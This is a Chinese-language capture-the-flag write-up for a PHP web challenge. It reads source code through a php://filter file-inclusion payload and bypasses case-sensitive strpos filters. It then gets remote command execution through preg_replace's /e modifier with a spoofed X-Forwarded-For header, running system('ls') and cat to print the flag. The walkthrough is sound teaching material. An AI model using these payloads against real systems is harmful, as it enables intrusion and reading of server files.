题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统
逐个点击菜单栏,发现只有设备维护中心有跳转
题目提示了利用后门入侵,应该和网站后台页面有关系
首先使用dirsearch扫描网站目录,发现有个/index.php/login目录
dirsearch 是一款网络路径扫描器,自带的字典比较齐全,个人认为比较好用
下载地址:https://github.com/maurosoria/dirsearch
尝试访问,发现页面有超链接,尝试点击
发现page有默认的参数,并且修改这个参数后也会有输出
猜测是文件包含漏洞,尝试使用php伪协议读取文件:
PHP伪协议读取文件源码用法
1 2 |
|
PHP伪协议执行php代码用法
1 2 3 4 |
|
php伪协议用法参考:https://www.cnblogs.com/endust/p/11804767.html
构造payload读取index.php
/index.php/login?page=php://filter/read=convert.base64-encode/resource=index.php
对读取的内容进行BASE64解密
BASE64解密在线工具:http://www.jsons.cn/base64/
第一部分关键代码分析:(拿不到flag可以直接跳到第二部分的代码分析看)
<?php
$page = $_GET[page];
if (isset($page)) {
if (ctype_alnum($page)) { //ctype_alnum() 函数检测字符串是否全部为字母和(或)数字字符。
?>
<br /><br /><br /><br />
<div style="text-align:center">
<p class="lead"><?php echo $page; die();?></p>
<br /><br /><br /><br />
<?php
}else{
?>
<br /><br /><br /><br />
<div style="text-align:center">
<p class="lead">
<?php
//strpos()函数查找字符串在另一字符串中第一次出现的位置(区分大小写),返回字符串在另一字符串中第一次出现的位置,如果没有找到字符串则返回 FALSE
if (strpos($page, 'input') > 0) {
die();
}
if (strpos($page, 'ta:text') > 0) {
die();
}
if (strpos($page, 'text') > 0) {
die();
}
if ($page === 'index.php') {
die('Ok');
}
include($page); //如果前面的验证都通过了,就会包含$page
die();
?>
关键函数:
ctype_alnum() 函数检测字符串是否全部为字母和(或)数字字符;
strpos()函数查找字符串在另一字符串中第一次出现的位置(区分大小写),返回字符串在另一字符串中第一次出现的位置,如果没有找到字符串则返回 FALSE;
首先会对传入的参数使用type_alnum() 函数检测,因为我们使用的是php伪协议包含了' :// ',不全是字母和(或)数字字符,接下来就会进入else{}部分,一共有4次的strpos()函数判断,只要参数中存在:input、ta:text、text、index.php就会执行die()结束程序(之所以把input也过滤了,是因为我们要使用伪协议的php:input来执行代码查看flag路径)
而想要到达include包含,就要想办法绕过strpos(),而strpos()是区分大小写的,我们只要使用php://INPUT即可绕过
构造payload
但是却没有我们想要的结果输出,好吧,应该是php://input的利用条件没有满足
是真的坑,被这部分代码干扰消耗了许多时间
再来审计第二部分关键代码:
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<br >Welcome My Admin ! <br >";
$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];
//?pat=/123/e&rep=phpinfo()&sub=123
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace($pattern, $replacement, $subject);//preg_replace 函数执行一个正则表达式的搜索和替换。
//搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。
}else{
die();
}
}
preg_replace是已知存在/e代码执行漏洞的
/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码
利用此漏洞的同时需要抓包构造X-Forwarded-For: 127.0.0.1才能进入if语句内部
构造payload查看当前目录(记得抓包添加X-Forwarded-For: 127.0.0.1)
http://111.200.241.244:65502/index.php?pat=/ok/e&rep=system('ls')&sub=okk
修改payload查看s3chahahaDir目录,发现flag
/index.php?pat=/ok/e&rep=system(%27ls%20s3chahahaDir/%27)&sub=okk
修改payload查看flag文件夹下内容
/index.php?pat=/ok/e&rep=system(%27ls%20s3chahahaDir/flag/%27)&sub=okk
读取flag.php文件
/index.php?pat=/ok/e&rep=system(%27cat%20s3chahahaDir/flag/flag.php%27)&sub=okk
cyberpeace{05d630f89591041c654a2b6245f2080a}